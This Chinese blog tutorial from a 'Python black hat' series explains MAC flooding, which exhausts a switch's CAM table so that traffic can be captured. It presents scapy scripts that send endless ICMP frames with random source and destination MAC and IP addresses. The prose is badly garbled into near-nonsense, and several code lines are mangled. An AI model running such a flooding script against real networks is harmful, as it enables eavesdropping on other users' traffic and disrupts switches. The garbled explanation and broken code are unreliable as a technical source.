Menu
0 Comments

Python黑帽编程 3.3 MAC洪水攻击 – 玄魂工作室

国际公约电话交替发生机(我只测量法我流畅运用的彼此的机具)。,如知识发生却因此表述)在资料转发手续中依托对CAM表的查询来决定右边的转发啮合,应答的MAC的对应门口不克不及在曲中找到。,即将到来的资料帧将被处置为播送帧。。凸轮台的性能是有穷的的。,就是小半工程可以回忆。,当凸轮表的MAC地址到达上限时,新的门口不克添加到CAM表中。

由于很准绳,we的主宰格形式会撞见单独非凡的风趣的气象。。PC陆续发送资料帧到未知界限。,而且每个包的源MAC地址是两样的。,当这些隶属的小组织以十足快的吼叫发送时,在突破时间内凌厉的地充分孢间连丝的凸轮表。。这些伪造的MAC地址利用了CAM表。,真马 C地址门口无法进入CAM表。。经过电话交替发生机的若干正规的单播资料帧都是PROC。。在这种情况下,电话交替发生机被退化为集中器。。

当电话交替发生机被退化为集中器后,,we的主宰格形式可以监控连接到电话交替发生机主人的主宰资料。。

自然,详细彼此的装置对ARP洪水的应答是相异的,现场测量法是责无旁贷的的。。现时让we的主宰格形式进入规划联系在一起。。

编码技击术

有大量方式来安排随机MAC和IP地址。,由于地址的基准体式是在的。,集合起来简单明了。。在这里要给全部绍介的是scapy模块正中鹄的RandMAC和RandIP方式。这两种方式被用来随机地制定MAC和IP地址。,接纳模板决定因素的方式,制定假设段的地址。。

诸如,上面的密码:

#!/usr/bin/python

from scapy.all import *

i=5

(i)

    print RandMAC()

    print RandIP()

    i=i-1

运转发生列举如下图:

图2

假如必要IP来制定整齐的的网状物段,您可以输出详细说明的模板。。

#!/usr/bin/python

from scapy.all import *

i=5

(i)

    print RandIP(“.*”)

    i=i-1

运转发生列举如下:

图3

在求解随机成绩继,现时让we的主宰格形式思索哪样的资料包可以到达即将到来的决意。让we的主宰格形式,假如we的主宰格形式的包中有详细说明的源IP和MAC。,此后孢间连丝将记载它。。

诸如ARP包:

Ether(SRC)RandMAC(),dst=FF:FF:FF:FF:FF:FFARP(OP)2,
psrc=
“”, hwdst=FF:FF:FF:FF:FF:FF)/Padding(负担)“X”*18))

诸如,ICMP包装盒。:

Ether(SRC)RandMAC(“*:*:*:*:*:*”),

dst=RandMAC(“*:*:*:*:*:*”)) / \

IP(SRC)RandIP(“*.*.*.*”),

dst=RandIP(“*.*.*.*”)) / \

ICMP()

处理了这两个感情成绩。,你可以写出极盛时的密码。:

图4

#!/usr/bin/python

import sys

from scapy.all import *

import time

iface=”eth0″

if Le())> 2

    iface=[1]

(1)

    packet= Ether(SRC)RandMAC(“*:*:*:*:*:*”),

                  dst=RandMAC(“*:*:*:*:*:*”)) / \

    IP(SRC)RandIP(“*.*.*.*”),

    dst=RandIP(“*.*.*.*”)) / \

    ICMP()

    ()

    sendp(packet,iface=iface,loop=0)

上述的密码陆续发送ICMP资料包。,来完成MAC洪水攻击。运转发生列举如下:

图5

2总结

本条缺少关心规划的新知识。,相信对交替发生网状物和以太网有必然的相识的人。。

下一节,让we的主宰格形式探究对VLAN的攻击。。

VLAN攻击分开已在WeChat订阅号中发布的新闻。,炽热的先生输出订阅号码(在水下二维码),从菜单栏> Python黑帽规划,您可以进入。。

检查极盛时的追逐接连,请留意我的微信订阅号(宣匈521),低维二维码,恢复王蛇。成绩议论请加QQ群。:Hacking (1群):303242737   Hacking (2群):147098303。

 

诡秘的灵魂工作空间

发表评论

电子邮件地址不会被公开。 必填项已用*标注